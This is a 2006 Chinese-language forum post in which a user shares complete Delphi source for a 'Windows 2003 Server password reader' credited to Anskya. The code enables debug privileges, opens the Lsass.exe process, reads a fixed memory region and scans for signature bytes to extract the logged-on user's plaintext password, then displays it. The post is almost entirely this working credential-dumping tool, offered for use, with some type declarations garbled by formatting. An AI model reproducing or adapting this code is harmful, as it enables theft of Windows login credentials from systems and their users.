|
論壇說明 |
歡迎您來到『史萊姆論壇』 ^___^ 您目前正以訪客的身份瀏覽本論壇,訪客所擁有的權限將受到限制,您可以瀏覽本論壇大部份的版區與文章,但您將無法參與任何討論或是使用私人訊息與其他會員交流。若您希望擁有完整的使用權限,請註冊成為我們的一份子,註冊的程序十分簡單、快速,而且最重要的是--註冊是完全免費的! 請點擊這裡:『註冊成為我們的一份子!』 |
|
主題工具 | 顯示模式 |
2006-05-31, 08:30 AM | #1 |
榮譽會員
|
軟體 - Win2003 Server密碼讀取器1.0 [Delphi代碼]
Win2003 Server密碼讀取器1.0 [Delphi代碼]
什麼都不說了~既然有人認為我是轉載別人代碼改名字就說是自己寫的代碼 我也不在乎了...接著丟LJ~~ CODE: { Windows 2003 Server[Chinese] 密碼讀取器 V1.0 By Anskya Email:Anskya@Email.com Web:www.Anskya.Net 感謝:WinEggDrop 提供的C源代碼... 也感謝許許多多的朋友支持和幫助 感謝:火狐技術聯盟的支持www.Wrsky.com } program GetWin2003Pass; uses Windows,TlHelp32; const BaseAddress = $002b5000; //讀取密碼基址 TZM1:String = 'Remote Procedure Call (RPC)'; //第一條特徵碼 TZM2:String = #02#0#0#0#0#0#0; //第二條特徵碼 procedure MsgBox(Msgs:String); begin MessageBox(0,Pchar(Msgs),nil,0); end; procedure GetDebugPrivs; //提升工作行程訪問權限 var hToken: THandle; tkp: TTokenPrivileges; retval: dword; begin If (OpenProcessToken(GetCurrentProcess, TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY, hToken)) then begin LookupPrivilegeValue(nil,'SeDebugPrivilege', tkp.Privileges[0].Luid); tkp.PrivilegeCount := 1; tkp.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED; AdjustTokenPrivileges(hToken, False, tkp, 0, nil, retval); end; end; function Is2003:Boolean; //判斷當前系統是否是Windows 2003 var osVerInfo: TOSVersionInfo; begin Result:=False; ZeroMemory(@osVerInfo,sizeof(osVerInfo)); osVerInfo.dwOSVersionInfoSize := SizeOf(TOSVersionInfo); if GetVersionEx(osVerInfo) then begin if (osVerInfo.dwMajorVersion=5)and(osVerInfo.dwMinorVersion=2) then Result:=True; end; end; function GetProcessPID(Process:Pchar)WORD; //查找工作行程並返回PID var Process32: TProcessEntry32; ProcessSnapshot: THandle; begin Result:=0; ProcessSnapshot := CreateToolHelp32SnapShot(TH32CS_SNAPALL, 0); Process32.dwSize := SizeOf(TProcessEntry32); Process32First(ProcessSnapshot, Process32); repeat if lstrcmpi(Process,Process32.szExeFile) = 0 then Result:=Process32.th32ProcessID; until not (Process32Next(ProcessSnapshot, Process32)); CloseHandle(ProcessSnapshot); end; function FindPassword(PIDWORD):String;//查找工作行程中的密碼 var Buffer:string; RetWORD; I,iPos:Integer; ProcessHandleWORD; begin if PID =0 then Exit; GetDebugPrivs; ProcessHandle:=OpenProcess(PROCESS_VM_READ,FALSE,PID); if ProcessHandle > 0 then begin SetLength(Buffer, 5120); if ReadProcessMemory(ProcessHandle,Pointer(BaseAddress),Pchar(Buffer),5120,Ret) then begin iPos := Pos(TZM1, Buffer); if iPos > 0 then begin Buffer:=Copy(Buffer,iPos,Length(Buffer)); iPos:=Pos(TZM2, Buffer); if iPos>0 then begin iPos:=iPos+Length(TZM2); Buffer:=Copy(Buffer,iPos,Length(Buffer)); for I:= 0 to Length(Buffer) do begin if Buffer[i] = #$80 then break; if Buffer[i] <> #$00 then Result:=Result+Buffer[i]; end; Result:=Pchar(Result); end else MsgBox('掃瞄第二次特徵碼失敗'); end else MsgBox('掃瞄第一次特徵碼失敗'); end else MsgBox('Lsass.exe工作行程讀取失敗'); end else MsgBox('打開工作行程Lsass.exe失敗'); end; procedure WinMain; var PIDWORD; Password,StrTemp:String; UserName:Array[0..MAX_PATH] of char; UserLenWORD; begin if Is2003 then begin PID:=(GetProcessPID('Lsass.exe')); if PID>0 then begin Password:=FindPassword(PID); if Password <> '' then begin if GetUserName(UserName,UserLen) then begin StrTemp:='當前用戶名:'+UserName+#10#13+'當前密碼:'+Password; MessageBox(0,Pchar(StrTemp),'Win2003 密碼讀取器 V1.0 By Anskya',0); end else MsgBox('獲取用戶名失敗'); end else MsgBox('獲取密碼失敗'); end else MsgBox('查找Lsass.exe失敗'); end else MsgBox('此系統不是Win2003'); end; begin WinMain; end. |
送花文章: 3,
|